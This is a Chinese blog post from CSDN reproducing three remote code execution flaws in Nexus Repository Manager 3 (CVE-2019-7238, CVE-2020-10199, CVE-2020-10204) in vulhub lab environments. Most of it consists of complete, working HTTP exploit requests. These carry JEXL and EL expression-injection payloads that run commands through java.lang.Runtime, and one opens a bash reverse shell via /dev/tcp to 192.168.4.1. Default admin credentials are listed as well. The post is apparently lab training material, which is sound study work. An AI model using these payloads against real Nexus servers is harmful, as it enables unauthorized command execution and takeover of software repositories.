vulhub漏洞复现43_Nexus

最新推荐文章于 2024-04-06 06:43:40 发布
最新推荐文章于 2024-04-06 06:43:40 发布
阅读量1.5k 收藏 1
点赞数 1
文章标签: 安全 java maven web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122846420
版权

前言

Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。

一、 CVE-2019-7238_Nexus Repository Manager 3 远程命令执行漏洞

漏洞详情

其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。

环境搭建

靶场:192.168.4.10_ubuntu

执行如下命令启动Nexus Repository Manager 3.14.0:

#docker-compose up -d

等待一段时间环境才能成功启动,访问`http://your-ip:8081`即可看到Web页面。

使用账号密码`admin:admin123`登录后台,然后在maven-releases下随便上传一个jar包:

触发该漏洞,必须保证仓库里至少有一个包存在。

漏洞复现

接口没有校验权限,所以直接发送如下数据包,即可执行`touch /tmp/success`命令:

```

POST /service/extdirect HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0

Accept: */*

Content-Type: application/json

X-Requested-With: XMLHttpRequest

Content-Length: 368

Connection: close

{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":

[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('touch /tmp/success')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}

```

 

可见,`/tmp/success`已成功执行:

 

二、 CVE-2020-10199_Nexus Repository Manager 3 远程命令执行漏洞

漏洞详情

Nexus Repository Manager 3 是一款软件仓库,其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞。

漏洞环境

执行如下命令启动Nexus Repository Manager 3.21.1:

#docker-compose up -d

等待一段时间环境才能成功启动,访问`http://your-ip:8081`即可看到Web页面。

该漏洞需要至少普通用户身份,所以我们需要使用账号密码`admin:admin`登录后台。

 

漏洞复现

登录后,复制当前Cookie和CSRF Token,发送如下数据包,

1. 即可执行EL表达式:

```

POST /service/rest/beta/repositories/go/group HTTP/1.1

Host: 127.0.0.1:8081

Content-Length: 205

X-Requested-With: XMLHttpRequest

X-Nexus-UI: true

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36

NX-ANTI-CSRF-TOKEN: 0.5820004074505312

Content-Type: application/json

Accept: */*

Origin: http://127.0.0.1:8081

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Referer: http://127.0.0.1:8081/

Accept-Encoding: gzip, deflate, br

Accept-Language: zh-CN,zh;q=0.9

Cookie:NX-ANTI-CSRF-TOKEN=0.5820004074505312; NXSESSIONID=fd935f0d-376f-4e66-af0a-2ec4323e30ec

Connection: close

{

  "name": "internal",

  "online": true,

  "storage": {

    "blobStoreName": "default",

    "strictContentTypeValidation": true

  },

  "group": {

    "memberNames": ["$\\A{233*233*233}"]

  }

}

```

 

2. 文件创建

‘’’

{

  "name": "internal",

  "online": true,

  "storage":

 {

    "blobStoreName": "default",

    "strictContentTypeValidation": true

  },

  "group":

 {

    "memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"]

  }

}

‘’’

 3. 反弹shell

‘’’

{

  "name": "internal",

  "online": true,

  "storage":

 {

    "blobStoreName": "default",

    "strictContentTypeValidation": true

  },

  "group":

 {

    "memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.4.1/19111 0>&1')}"]

  }

}

‘’’

成功触发

 

三、 CVE-2020-10204_Nexus Repository Manager 3 远程命令执行漏洞

漏洞详情

Nexus Repository Manager 3 :

3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞是CVE-2018-16621的绕过。

漏洞环境

执行如下命令启动Nexus Repository Manager 3.21.1:

```

docker-compose up -d

```

等待一段时间环境才能成功启动,访问`http://your-ip:8081`即可看到Web页面。

该漏洞需要访问更新角色或创建角色接口,所以我们需要使用账号密码`admin:admin`登录后台。

漏洞复现

登录后台后,复制当前Cookie和CSRF Token,发送如下数据包,即可执行EL表达式:

```

POST /service/extdirect HTTP/1.1

Host: 127.0.0.1:8081

Content-Length: 223

X-Requested-With: XMLHttpRequest

X-Nexus-UI: true

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36

NX-ANTI-CSRF-TOKEN: 0.5820004074505312

Content-Type: application/json

Accept: */*

Origin: http://127.0.0.1:8081

Referer: http://127.0.0.1:8081/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie:NX-ANTI-CSRF-TOKEN=0.5820004074505312; NXSESSIONID=9dfc8f86-503b-45ac-82f6-5cb93eb01e18

Connection: close

{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\B{233*233}"]}],"type":"rpc","tid":11}```

 #同上可测试文件创建,反弹shell

Revenge_scan
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2018-8897
08-01
CVE-2018-8897 Exp, 我在Windows 2008 R2 测试成功1次,失败3次,其他系统没有测试过
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)
ch258563的博客
06-06 1387
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)
Vulhub漏洞复现环境搭建流程,37岁程序员被裁
最新发布
m0_60608008的博客
04-06 557
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
NEXUS CVE-2020-10204 漏洞复现
MDSEC的博客
08-17 564
Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。CVE-2020-10199的漏洞需要普通用户权限即可触发,而CVE-2020-10204则需要管理员权限。两个漏洞的触发原因均是不安全的执行EL表达式导致的。这样漏洞复现完毕,中途又不懂的代码可看前一文章有详细讲解。2.用弱口令登录,账号:admin,密码:admin。在虚拟机验证是否成功。
CVE-2020-10199 Nexus Repository Manager 3 远程命令执行漏洞复现
ierciyuan的博客
08-01 1039
CVE-2020-10199 Nexus Repository Manager 3 远程命令执行漏洞复现。测试漏洞并反弹shell。
Nexus Repository Manager3( CVE-2020-10199) 远程命令执行漏洞排查
dayouzi的博客
08-14 837
nexus的全称是Nexus Repository Manager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。主要用它来搭建公司内部的maven私服。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、git lfs、yum、go、apt等的私有仓库,功能非常强大。
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
weixin_45260839的博客
05-29 1604
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
Nexus 6.0 Binarry Indicator (2).zip_Nexus 6.0_Nexus 6.0 Binarry_
07-15
Nexus, is one of the best indicator to use in the forex markets, and actually has the best accuracy to trade automatically.
upload_nexus.sh
08-16
用于上次文件到nexus上 运行如下: ./upload_nexus.sh "http://10.0.0.88/repository/your_repo" "admin" "123456" "v001001" "/home/jenkins/agent/workspace/{job_name}/{project_name}/target/api.war" ...
Nexus_6_1_nexus_mql_
09-29
indicator binary profit ok
clean_nexus.zip
03-02
在使用jenkins+nexus做持续集成自建maven私服仓库时,因nexus的删除项目文件操作只是对文件做删除标识,文件并未真正删除。会导致磁盘空间持续增长,影响正常使用。该程序主要是找出有删除标识的文件并进行清理。
b_Cisco_Nexus_9000_Series_NX-OS_VXLAN_Configuration_Guide_7x.pdf
03-15
N9K上NX-OS的VxLAN设计与配置。N9K上NX-OS的VxLAN设计与配置。N9K上NX-OS的VxLAN设计与配置。N9K上NX-OS的VxLAN设计与配置。N9K上NX-OS的VxLAN设计与配置。N9K上NX-OS的VxLAN设计与配置。N9K上NX-OS的VxLAN设计与...
Nexus 3越权漏洞(CVE-2020-11444)
m0_65150886的博客
02-18 401
Nexus Repository Manager 3.x OSS / Pro <= 3.21.1Nexus 3的版本中,存在任意修改admin密码越权漏洞,攻击者可以用低权限用户登录获取sessionID越权进行修改admin用户的密码。Nexus Repository是一个开源的仓库管理系统,可搭建npm、maven等私服。3.F12,打开开发者模式,在应用程序中查找NXSESSIONID。1.访问http://ip:port,出现如下页面,开始实验。2.点击登录,输入默认账号密码进行登录。
Nexus Repository Manager3 EL注入(CVE-2018-16621)
黑白的博客
12-05 1131
声明 好好学习,天天向上 漏洞描述 在 org.sonatype.nexus.security.privilege.PrivilegesExistValidator 和 org.sonatype.nexus.security.role.RolesExistValidator 类中,会将没有找到的 privilege 或 role 放入错误模板中,而在错误模板在渲染的时候会提取其中的EL表达式并执行 影响范围 Nexus Repository Manager 3.x OSS / Pro <= 3.14.
Sonatype Nexus Repository Manager 3远程代码执行漏洞(CVE-2019-7238)
不忘初心,护天下安全!
07-12 1637
研究人员在 Sonatype Nexus Repository Manager ( NXRM ) 3 中发现一个远程代码执行漏洞。Sonatype Nexus Repository Manager ( NXRM ) 3 是一个允许开发者管理软件开发、应用实现、自动硬件提供所必须的软件组件的开源项目。漏洞影响的 NXRM 3 目前安装量已经超过 15 万,该漏洞是腾讯安全云鼎实验室安全研究员 Rico 和长亭科技安全研究员 voidfyoo 发现的。研究人员通过分析发现利用该安全漏洞并不需要认证。因此攻击者很
[CVE-2020-10199/10204] Nexus Repository Manager 3 RCE
公众号shadow sock7
04-02 5828
参考 https://support.sonatype.com/hc/en-us/articles/360044882533 https://mp.weixin.qq.com/s/xUWPVwcNL6n6snn_gV_UwA 漏洞描述 XSS就算了。 RCE: an attacker with any type of account on NXRM to execute arbitrary ...
Web攻击及防御
龙卷风摧毁停车场
10-13 1818
目录穿越 原理 目录穿越(也被称为目录遍历/directory traversal/path traversal)是通过使用 …/ 等目录控制序列或者文件的绝对路径来访问存储在文件系统上的任意文件和目录,特别是应用程序源代码、配置文件、重要的系统文件等。 攻击方式 基础目录遍历 修改filename的参数值,利用../返回上一级遍历任意文件 修改为 filename=../../../etc/passwd 绝对路径 有些网站会采取目录遍历的防护措施,如过滤掉../等关键字 可通过绝对路径,无需返回上级
nexus3.54.0版本存在哪些漏洞
06-08
我很抱歉,作为一个AI语言模型,我无法直接提供关于Nexus 3.54.0版本的漏洞信息。但是,我可以告诉您,获取关于软件或产品的漏洞信息应该通过官方途径进行,例如官方网站或安全公告。您可以在Sonatype官方网站上查找...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值